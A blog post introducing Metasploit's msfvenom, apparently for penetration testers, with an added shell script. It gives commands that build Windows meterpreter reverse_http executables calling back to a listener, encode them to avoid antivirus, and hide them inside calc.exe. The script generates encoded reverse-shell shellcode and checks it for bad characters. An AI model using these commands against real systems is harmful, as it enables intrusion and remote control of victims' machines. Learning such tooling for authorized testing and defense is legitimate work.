So unfortunately I have not had the time lately to keep up to date with the changes going on in Metasploit, but one thing that caught my eye was the msfvenom binary in the root of the framework3 directory. Neat name, but what is it? A little googling found me this blog post by bannedit. He goes on to mention that msfvenom simply combines the functionality of both msfpayload and msfencode.
[code lang="bash"]Usage: ./msfvenom [options]
Options:
    -p, --payload    [payload]        Payload to use. Specify a '-' or stdin to use custom payloads
    -l, --list       [module_type]    List a module type example: payloads, encoders, nops, all
    -n, --nopsled    [length]         Prepend a nopsled of [length] size on to the payload
    -f, --format     [format]         Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
    -e, --encoder    [encoder]        The encoder to use
    -a, --arch       [architecture]   The architecture to use
        --platform   [platform]       The platform of the payload
    -s, --space      [length]         The maximum size of the resulting payload
    -b, --bad-chars  [list]           The list of characters to avoid example: '\x00\xff'
    -i, --iterations [count]          The number of times to encode the payload
    -c, --add-code   [path]           Specify an additional win32 shellcode file to include
    -x, --template   [path]           Specify a custom executable file to use as a template
    -k, --keep                        Preserve the template behavior and inject the payload as a new thread
    -h, --help                        Show this message[/code]
The new and quick way to create a meterpreter payload would be this:

[code lang="bash"]./msfvenom -p windows/meterpreter/reverse_http -f exe LHOST=192.168.1.111 LPORT=80 > payload.exe[/code]

Moving on to include encoding with 5 iterations (shikata_ga_nai is what gets picked for an x86 payload when no encoder is named; note that current Metasploit releases require an encoder name after -e, so there you would write -e x86/shikata_ga_nai explicitly):

[code lang="bash"]./msfvenom -p windows/meterpreter/reverse_http -e -i 5 -f exe LHOST=192.168.1.111 LPORT=80 > payload.exe[/code]

And finally, hiding inside a trusted executable. Without -k the template's original code never runs, so this copy of calc.exe does nothing but launch the payload; add -k to keep calc working and run the payload in a new thread instead:

[code lang="bash"]./msfvenom -p windows/meterpreter/reverse_http -e -i 5 -x calc.exe -f exe LHOST=192.168.1.111 LPORT=80 > payload.exe[/code]

For those that didn't know, creating a Windows exe payload always uses data/templates/template_x86_windows.exe as the host executable, and the payload is written into that template. This can be changed on the fly, as we did above with the -x calc.exe flag, or permanently by swapping out template_x86_windows.exe for whatever you wish. If you don't want the template method at all, the old way to get a very small executable is the -f exe-small flag, but beware: most AV products will catch this!
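When the output is raw shellcode rather than an exe (the same -p/-e/-i options with -f raw), the -b and -s flags from the usage text above are the two constraints worth verifying independently before the bytes go anywhere near an exploit. The script below is an added example, not code from the original post or from the Metasploit project: it wraps msfvenom with those options and then checks the resulting file itself for forbidden bytes and for the size limit. The payload, LHOST, LPORT, bad-char list and 512-byte limit are assumed values; the MSFVENOM path defaults to ./msfvenom as in the post and the generation step only runs if that binary exists.

```shell
#!/bin/sh
# Added example (not from the original post): generate raw shellcode with
# msfvenom and verify the -b and -s constraints independently of the tool.

# Print every byte of FILE as two-digit lowercase hex, one per line.
hexdump_bytes() {
    od -An -v -tx1 "$1" | tr ' ' '\n' | sed '/^$/d'
}

# check_badchars FILE LIST
#   LIST uses the msfvenom -b notation, e.g. '\x00\x0a\x0d'.
#   Returns 0 when none of the listed bytes occurs in FILE, 1 otherwise
#   (each offending byte is reported on stderr).
check_badchars() {
    file=$1
    list=$2
    # '\x00\x0a' -> ' 00 0a', which the unquoted for-loop splits into words
    bad=$(printf '%s' "$list" | sed 's/\\x/ /g' | tr 'A-F' 'a-f')
    found=0
    for b in $bad; do
        if hexdump_bytes "$file" | grep -qx "$b"; then
            echo "bad char \\x$b present in $file" >&2
            found=1
        fi
    done
    return $found
}

# check_size FILE MAX
#   Returns 0 when FILE is at most MAX bytes (the value you passed to -s).
check_size() {
    size=$(wc -c < "$1" | tr -d ' ')
    [ "$size" -le "$2" ]
}

# gen_payload OUT BADCHARS
#   Raw x86 shellcode, encoded to avoid BADCHARS. The encoder is named
#   explicitly because current msfvenom requires an argument to -e.
#   Assumed values: payload, LHOST and LPORT below.
gen_payload() {
    "$MSFVENOM" -p windows/meterpreter/reverse_http LHOST=192.168.1.111 LPORT=80 \
        -e x86/shikata_ga_nai -i 5 -b "$2" -f raw > "$1"
}

MSFVENOM=${MSFVENOM:-./msfvenom}
BAD='\x00\x0a\x0d'   # assumed bad-char list for the target
MAXLEN=512           # assumed size limit, matching what you would pass to -s

# Only generate when msfvenom is actually present; the checks work on any file.
if [ -x "$MSFVENOM" ]; then
    gen_payload payload.bin "$BAD"
    if check_badchars payload.bin "$BAD" && check_size payload.bin "$MAXLEN"; then
        echo "payload.bin: no bad chars, $(wc -c < payload.bin) bytes, OK"
    else
        echo "payload.bin: constraint violated, regenerate with another encoder or more iterations" >&2
    fi
fi
```

Running the checks yourself matters because encoding is what removes the bad bytes from the encoded body, but the decoder stub prepended by the encoder and the output of each extra -i iteration still have to be free of them too; if the check fails, the usual moves are a different encoder, more iterations or a revised bad-char list.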
